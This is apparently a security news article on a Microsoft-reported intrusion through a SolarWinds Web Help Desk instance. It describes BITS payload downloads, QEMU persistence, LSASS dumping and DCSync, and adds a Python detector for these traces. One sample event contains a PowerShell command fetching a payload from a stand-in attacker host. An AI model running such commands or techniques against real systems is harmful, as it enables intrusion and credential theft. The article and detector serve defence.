
Microsoft disclosed that it observed a multi-stage intrusion in which an attacker exploited an Internet-exposed SolarWinds Web Help Desk (WHD) instance to gain initial access and move laterally across an organization’s network to other high-value assets.
That said, the Microsoft Defender Security Research Team says it is unclear whether this activity weaponized the recently disclosed flaws (CVE-2025-40551, CVSS score: 9.8, and CVE-2025-40536, CVSS score: 8.1) or a previously patched vulnerability (CVE-2025-26399, CVSS score: 9.8).
“As the attack occurred in December 2025 and occurred simultaneously against machines vulnerable to both old and new sets of CVEs, we cannot confirm with certainty the exact CVEs used to gain an initial foothold,” the company said in a report released last week.
CVE-2025-40536 is a security control bypass vulnerability that allows an unauthenticated attacker to access certain restricted functionality, while CVE-2025-40551 and CVE-2025-26399 both refer to untrusted data deserialization vulnerabilities that could potentially lead to remote code execution.
Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of it being exploited in the wild. Federal Civilian Executive Branch (FCEB) agencies have been ordered to apply a fix for this flaw by February 6, 2026.
The attack detected by Microsoft successfully exploited an exposed SolarWinds WHD instance, giving the attacker unauthenticated remote code execution and the ability to run arbitrary commands within the WHD application context.

“Successful exploitation resulted in the service of the compromised WHD instance generating a PowerShell that leverages BITS [Background Intelligent Transfer Service] for downloading and executing the payload,” researchers Sagar Putil, Hardik Suri, Eric Hopper and Kajhon Soyini noted.
In the next stage, the attackers downloaded a legitimate component of Zoho ManageEngine, a remote monitoring and management (RMM) solution, which gave them persistent remote control over the infected systems. The attacker followed this with a series of actions:
- Enumerating sensitive domain users and groups, including domain administrators.
- Establishing persistence via reverse SSH and RDP access. To that end, the attacker created a scheduled task that launches a QEMU virtual machine under the SYSTEM account at system startup, hiding their activity inside the virtualized environment while exposing SSH access through port forwarding.
- Using DLL sideloading on some hosts: the legitimate system executable “wab.exe”, associated with the Windows Address Book, was used to launch a malicious DLL (“sspicli.dll”) that dumps the contents of LSASS memory for credential theft.
According to Microsoft, in at least one case, threat actors carried out DCSync attacks. This attack simulates a domain controller (DC) and requests password hashes and other sensitive information from the Active Directory (AD) database.
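The persistence and credential-theft steps above each leave a distinct telemetry trace (WHD service spawning PowerShell that uses BITS, wab.exe loading sspicli.dll from outside System32, a SYSTEM scheduled task that starts QEMU, and replication rights exercised by a non-DC account). The following Python is an added example of checking for those traces over constructed events; it is not code from Microsoft's report, and the event layout, rule names, WHD install path and account names are assumptions of this example.

```python
"""Toy detector for the intrusion steps described in the report, run over constructed
Sysmon/Security-style events. Field layout, rule names and paths are this example's own."""
import re
from typing import Optional

# Rights GUIDs a DCSync-style replication request exercises (Security Event 4662, Properties)
REPL_GUIDS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")
LEGIT_SSPICLI = r"c:\windows\system32\sspicli.dll"  # the only place the genuine DLL lives

def check(kind: str, fields: dict) -> Optional[str]:
    """Return a rule name if one event matches a step from the intrusion, else None."""
    f = {k: str(v).lower() for k, v in fields.items()}
    if kind == "process":
        # WHD service (assumed to run from a path containing 'webhelpdesk') spawning PowerShell
        # that fetches a payload through BITS
        if ("webhelpdesk" in f.get("parent", "") and f.get("image", "").endswith("powershell.exe")
                and re.search(r"start-bitstransfer|bitsadmin", f.get("cmdline", ""))):
            return "whd-powershell-bits"
    elif kind == "imageload":
        # wab.exe loading sspicli.dll from anywhere but System32 is the sideload described above
        if (f.get("image", "").endswith("wab.exe") and f.get("loaded", "").endswith("sspicli.dll")
                and f.get("loaded") != LEGIT_SSPICLI):
            return "wab-sspicli-sideload"
    elif kind == "task":
        # Scheduled task that boots a QEMU VM as SYSTEM (hide-inside-a-VM persistence)
        if "qemu" in f.get("command", "") and f.get("runas") == "system":
            return "qemu-system-task"
    elif kind == "dirsvc":
        # Replication rights exercised by an account that is not a DC computer account ($)
        if (any(g in f.get("properties", "") for g in REPL_GUIDS)
                and not f.get("subject", "").endswith("$")):
            return "dcsync"
    return None

def run(events):
    """Return (index, rule) for every event that trips a rule."""
    return [(i, r) for i, (kind, fields) in enumerate(events) if (r := check(kind, fields))]

SAMPLE = [  # constructed events; install paths, hostnames and account names are made up
    ("process", {"parent": r"C:\WHD\WebHelpDesk\bin\java.exe",
                 "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "cmdline": "powershell -c Start-BitsTransfer -Source http://attacker.example/p -Destination C:\\Users\\Public\\p.exe"}),
    ("process", {"parent": r"C:\WHD\WebHelpDesk\bin\java.exe",
                 "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell -c Get-Date"}),
    ("imageload", {"image": r"C:\Program Files\Windows Mail\wab.exe", "loaded": r"C:\Users\Public\sspicli.dll"}),
    ("imageload", {"image": r"C:\Program Files\Windows Mail\wab.exe", "loaded": r"C:\Windows\System32\sspicli.dll"}),
    ("task", {"command": r"C:\ProgramData\vm\qemu-system-x86_64.exe -hda disk.qcow2", "runas": "SYSTEM"}),
    ("dirsvc", {"subject": r"CORP\svc-backup", "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}),
    ("dirsvc", {"subject": r"CORP\DC01$", "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}),
]
```

Only the four events that reproduce a reported step trip a rule; the benign PowerShell child, the System32 copy of sspicli.dll and the domain controller's own replication request do not.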
To combat this threat, it is recommended that users keep their WHD instances up to date, locate and remove rogue RMM tools, rotate service and administrator account credentials, and isolate compromised machines to limit further spread.
“This activity reflects a common but high-impact pattern: If vulnerabilities are unpatched or poorly monitored, the exposure of a single application can potentially compromise an entire domain,” the Windows maker said.
“In this breach, the attackers relied heavily on resident techniques, legitimate management tools, and low-noise persistence mechanisms. These tradecraft choices reinforce the importance of layered defenses, timely patching of internet-facing services, and behavioral-based detection across the identity, endpoint, and network layers.”
